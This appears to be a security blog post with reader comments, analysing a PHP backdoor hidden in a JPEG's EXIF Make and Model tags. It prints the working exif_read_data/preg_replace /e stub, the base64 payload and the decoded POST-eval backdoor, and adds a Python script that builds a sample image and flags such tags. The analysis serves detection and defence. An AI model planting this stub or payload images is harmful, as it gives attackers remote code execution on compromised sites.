A few days ago, Peter Gramantik from our research team found a very interesting backdoor on a compromised site. This backdoor didn't rely on the usual patterns to hide its content (like base64/gzip encoding), but stored its data in the EXIF headers of a JPEG image. It also used the exif_read_data and preg_replace PHP functions to read the headers and execute itself.
Technical Details
The backdoor is divided into two parts. The first part is a mix of the exif_read_data function, to read the image headers, and the preg_replace function, to execute the content. This is what we found in the compromised site:

$exif = exif_read_data('/homepages/clientsitepath/images/stories/food/bun.jpg');
preg_replace($exif['Make'], $exif['Model'], '');

Both functions are harmless by themselves. exif_read_data is commonly used to read image metadata and preg_replace to replace the content of strings. However, preg_replace has a hidden and tricky option: if you pass the "/e" modifier in the pattern, it evaluates the replacement string as PHP code (eval) instead of just searching/replacing. Note that this modifier was deprecated in PHP 5.5 and removed in PHP 7.0, where the call fails with a warning rather than executing; preg_replace_callback is the supported way to run code on a match. Sites still running PHP 5.x, as this one was, remain exposed.
When we look at the bun.jpg file, we find the second part of the backdoor:
ÿØÿà^@^PJFIF^@^A^B^@^@d^@d^@^@ÿá^@¡Exif^@^@II*^@ ^H^@^@^@^B^@^O^A^B^@^F^@^@^@&^@^@^@^P^A^B^@m^@^@^@,^@^@^@^@^@^@^@/.*/e^ @ eval ( base64_decode("aWYgKGl zc2V0KCRfUE9TVFsie noxIl0pKSB7ZXZhbChzd HJpcHNsYXNoZXMoJF9QT1NUWyJ6ejEiXSkpO30=')); @ÿì^@^QDucky^@^A^@^D^@^@^@<^@^@ÿî^@^NAdobe^
The file starts normally with the common JFIF/Exif headers, but in the "Make" tag it has a strange value: "/.*/e". That is the exact modifier used by preg_replace to execute (eval) whatever replacement is passed to it.
Now things are getting interesting...
If we keep looking at the EXIF data, we can see the "eval ( base64_decode" hidden inside the "Model" tag. When you put it all together, we can see what is going on. The attackers read both the Make and Model tags from the EXIF and use them as the pattern and replacement arguments of preg_replace. Once we substitute $exif['Make'] and $exif['Model'] with what is in the file, we get the final backdoor:

preg_replace("/.*/e", "@ eval ( base64_decode(\"aWYgKGl ...\"));", '');

Because the pattern /.*/ matches the empty subject string '' exactly once, the replacement is evaluated as PHP code exactly once, and the leading @ suppresses any error output that might reveal it.
Once decoded, we can see that it simply executes whatever content is provided in the POST variable zz1. The full decoded backdoor is here:

if (isset($_POST["zz1"])) { eval(stripslashes($_POST["zz1"])); }
Steganography Malware
Another interesting point is that bun.jpg and the other images that were compromised still load and display properly. In fact, on these compromised sites, the attackers modified a legitimate, pre-existing image from the site; since decoders ignore unknown or odd EXIF strings, the picture renders as before. This is a curious steganographic way to hide the malware.
Note: Any of Sucuri's clients using Server Side Scanning are protected against this type of injection (detected by us).
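As an added example (not part of the original post, and not Sucuri's scanner), the following Python script rebuilds the layout described above in memory: a minimal JPEG whose APP1/Exif segment carries a Make tag of "/.*/e" and a Model tag of the "@ eval ( base64_decode(...))" string from the dump, then parses the TIFF IFD0 directly rather than trusting a library, and triages every ASCII tag the way a file scanner or IDS rule would: a PCRE-looking pattern whose modifier list contains "e", PHP code markers, and base64 runs that decode to PHP. The sample JPEG is constructed (it has no image data), the tag table and heuristics are my own, and the only data taken from the page is the payload string.

```python
"""Build a minimal JPEG with EXIF Make/Model tags, parse them, and triage for PHP backdoors."""
from __future__ import annotations

import base64
import re
import struct

# IFD0 ASCII tags worth inspecting (assumed list; extend as needed).
TAG_NAMES = {0x010E: "ImageDescription", 0x010F: "Make", 0x0110: "Model",
             0x0131: "Software", 0x013B: "Artist", 0x8298: "Copyright"}

# Payload from the bun.jpg dump, spaces removed; decodes to the zz1 POST eval.
PAYLOAD_B64 = ("aWYgKGlzc2V0KCRfUE9TVFsienoxIl0pKSB7ZXZhbChzdHJpcHNsYXNoZXMo"
               "JF9QT1NUWyJ6ejEiXSkpO30=")
SAMPLE_TAGS = {"Make": b"/.*/e",
               "Model": b'@ eval ( base64_decode("' + PAYLOAD_B64.encode() + b'"));'}


def build_exif_jpeg(tags: dict[str, bytes]) -> bytes:
    """Constructed sample: SOI + APP1/Exif (little-endian TIFF, like 'II*') + EOI."""
    name_to_tag = {v: k for k, v in TAG_NAMES.items()}
    entries = sorted((name_to_tag[n], v + b"\0") for n, v in tags.items())
    data_off = 8 + 2 + 12 * len(entries) + 4      # values follow the IFD
    ifd, blob = struct.pack("<H", len(entries)), b""
    for tag, val in entries:                      # type 2 = ASCII, count = bytes incl. NUL
        if len(val) <= 4:
            ifd += struct.pack("<HHI4s", tag, 2, len(val), val.ljust(4, b"\0"))
        else:
            ifd += struct.pack("<HHII", tag, 2, len(val), data_off + len(blob))
            blob += val
    ifd += struct.pack("<I", 0)                   # no IFD1
    app1 = b"Exif\0\0" + b"II" + struct.pack("<HI", 42, 8) + ifd + blob
    return b"\xff\xd8\xff\xe1" + struct.pack(">H", len(app1) + 2) + app1 + b"\xff\xd9"


def _parse_tiff(tiff: bytes) -> dict[str, str]:
    """Return the ASCII entries of IFD0, honouring the byte-order mark."""
    endian = {b"II": "<", b"MM": ">"}[tiff[:2]]
    ifd0 = struct.unpack(endian + "I", tiff[4:8])[0]
    count = struct.unpack(endian + "H", tiff[ifd0:ifd0 + 2])[0]
    out = {}
    for i in range(count):
        e = ifd0 + 2 + 12 * i
        tag, typ, n, raw = struct.unpack(endian + "HHI4s", tiff[e:e + 12])
        if typ != 2:
            continue
        val = raw[:n] if n <= 4 else tiff[(o := struct.unpack(endian + "I", raw)[0]):o + n]
        out[TAG_NAMES.get(tag, f"0x{tag:04X}")] = val.rstrip(b"\0").decode("latin-1")
    return out


def read_exif_ascii(jpeg: bytes) -> dict[str, str]:
    """Walk the JPEG segment chain to the APP1/Exif segment; stop at SOS or EOI."""
    if jpeg[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG")
    pos = 2
    while pos + 4 <= len(jpeg) and jpeg[pos] == 0xFF:
        marker = jpeg[pos + 1]
        if marker in (0xD9, 0xDA):                # EOI / SOS: no more metadata
            break
        length = struct.unpack(">H", jpeg[pos + 2:pos + 4])[0]
        seg = jpeg[pos + 4:pos + 2 + length]
        if marker == 0xE1 and seg.startswith(b"Exif\0\0"):
            return _parse_tiff(seg[6:])
        pos += 2 + length
    return {}


# Delimited PCRE whose trailing modifiers include 'e' (bracket-style delimiters not covered).
EVAL_MODIFIER = re.compile(r"^\s*([^\w\s\\]).*\1[imsxADSUXJu]*e[imsxADSUXJu]*\s*$", re.S)
CODE_MARKERS = re.compile(
    r"\b(eval|assert|system|passthru|shell_exec|base64_decode|preg_replace)\s*\(|\$_(POST|GET|REQUEST|COOKIE)\b",
    re.I)


def triage_exif(tags: dict[str, str]) -> list[str]:
    """Findings for EXIF strings that look like a /e pattern, PHP code, or base64-wrapped PHP."""
    findings = []
    for name, value in tags.items():
        if EVAL_MODIFIER.match(value):
            findings.append(f"{name}: PCRE pattern with 'e' (eval) modifier: {value!r}")
        if CODE_MARKERS.search(value):
            findings.append(f"{name}: PHP code marker: {value[:60]!r}")
        for run in re.findall(r"[A-Za-z0-9+/]{24,}={0,2}", value):
            try:
                decoded = base64.b64decode(run, validate=True).decode("ascii")
            except (ValueError, UnicodeDecodeError):
                continue
            if CODE_MARKERS.search(decoded):
                findings.append(f"{name}: base64 decodes to PHP: {decoded!r}")
    return findings


if __name__ == "__main__":
    for line in triage_exif(read_exif_ascii(build_exif_jpeg(SAMPLE_TAGS))):
        print(line)
```

To use it on real files, feed `open(path, "rb").read()` to `read_exif_ascii` and run `triage_exif` over a web root's image directories; a clean camera tag set such as Make "Canon" / Model "Canon EOS 5D Mark II" produces no findings, while the sample above produces three (the /e pattern, the eval marker, and the decoded POST handler). Stripping the metadata, for example with `exiv2 -d e`, removes the payload but not the PHP stub that loads it, so the stub must be found and removed as well.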
I appreciate all the hard research concerning this form of attack on a server, but unless there are working examples of the code demonstrating how it works, this is still all theory. What I have found is that there are a lot of posts describing this (theoretical) attack, but until I can test this out on my current server to see if there is a security flaw, I will conclude that this is all it is.
I have found several image files with the EXIF modified with the PHP code, and I have also found several on the site I host with the obfuscation, but I am yet to understand 1. how they reverse the obfuscation without having a script to reverse it, and 2. how they make a call to the EXIF code and run the script.
This may be my issue, but for each file I have discovered uploaded to my site with these modifications, I have then taken them and used a test bed server to see if I could run the code from the browser by accessing the image file directly, using the gif extension or changing it to php.
On all my tests, I have not been able to replicate what everyone is talking about. This tells me that there has to be a high degree of coding for the site that assumes many features are turned on or even installed on the Linux server.
Again, I appreciate the post, and the theoretical bit on how this could happen, and should happen, but without detailed examples showing this is possible it is nothing more than a potential threat and nothing more.
###########
exiv2 -d e bun.jpg
removes the EXIF metadata from the image.
#######
Hello guys,
I wrote a special tool that creates custom images with EXIF backdoors, but the difference between your finding and what our tool produces is that the future shellcode is obfuscated a little and then stored. Does your AV detect this, or is it based on base64 and eval combinations?
You can test it by yourself:
https://github.com/CCSIR/PHP-EXIF-Backdoors-generator-using-custom-shellcode
#########
We've been seeing this in our IPS from users hitting various external websites. It's just triggering on 'base64_decode' in the .jpg. When I decoded it and googled, I got this post. So all our alert is indicating is a compromised webserver on the internet, not malicious activity against our internal users?
Sanitising the inputs wouldn't have helped since the attacker could just disable that part of the code. The main interesting thing in this attack is the use of a little-used option to make a seemingly innocuous call to preg_replace execute code. However, having a hard-coded path to an image is odd and would probably draw attention to that part of the code.
Very nice article, I learned a lot from it, including a few methods (e.g. base64 vulnerable, gzip, HTTP compression etc...). I learned a lot more than the theory itself. Thanks
Couldn't this method also be used to tunnel through "next generation firewalls"?
That is, as soon as the firewall admin allows the client to browse the net (using http), even if various http-tunnel techniques will be blocked, this one will pass since jpegs would of course be allowed to be downloaded through http (as well as POSTed back to the server which is running the tunneling client)?
I don't get it... only compromised sites, where the attacker can modify the php code, are vulnerable... so he can put whatever he wants to execute code in the source code... even a system()... this is a very localized vulnerability...
Sorry for being a complete n00b. Do you mean to say that the malware-ridden image was uploaded to a site that allowed execution, thus providing a backdoor for the attacker?
As stated by others, there's no reason this can't be extended to hiding code anywhere, in any type of file that is valid, like the PNG format in the "iTXt", "tEXt", or slightly more insidious "zTXt" chunks of a PNG file, hidden in a sound format stream etc etc.
Interesting way to hide your payload code. I suppose if there was some file integrity checking (a la tripwire/aide) on the system in question hosting the picture it *might* have raised flags, but even a .jpg can be expected to change on a website, so it might escape the cursory glance of a nightly report.
Not being terribly PHP savvy, the hosted picture wouldn't have to be on the same host, but hosted elsewhere and loaded through a URL call.. Even that could escape a nightly report, with some devs loading offsite code like jQuery..
Probably the only real protection while using PHP would be to disable some functions, like eval or preg_*(), via php.ini, or use the hardened PHP project, Suhosin, which does remove the e from preg*.
Also I wonder how many IDS/IPS systems out there would warn that the jpg/jpeg that just flashed by on the wire contained something odd in its EXIF area (or for that matter, as you mentioned, a png file containing stuff in the iTXt, tEXt or zTXt)?
I think it would be hard to do, because the system would have to examine every data stream, and would likely take a decent performance hit attempting to do that (not everything is plain text code, compressed code, etc).
I suppose the idea is the IPS/IDS would detect the intrusion (if properly configured) before the black hat in question has a chance to modify a system, before pulling down the payload. There are just too many ways to hide one. However, there's always a breadcrumb trail to follow if you know how and where to look.
The post leaves a little ambiguity on the attack. A lot of people leaving comments seem to think this is some injection attack.
From my take, this is a backdoor. I take it the attacker already had access to the system (from another vulnerability) and replaced the bun.jpg with the modified EXIF headers. The attacker also put the PHP code into some source where it's executed. This allows the attacker to issue system commands remotely at any time, even after they patch his initial entry point.
Daniel Cid, is this accurate? Or did the attacker magically know (this might have been an open-source application) that preg_replace is used this way?
Yes, 100% accurate. It is a backdoor added after the attackers got access to the site.
To be honest, the EXIF headers are more or less irrelevant here - the input could be from anything. The problem is using preg_replace with untrusted input, although I should probably blame both whoever wrote that code and PHP itself for making it so easy to shoot yourself in the foot.
Should be clear that it's bad to pass untrusted input into the first parameter of preg_replace. We routinely do something like preg_replace("/[^a-zA-Z0-9]/", "", $_REQUEST['param']) to clean user input.
p.s. With great power comes great responsibility.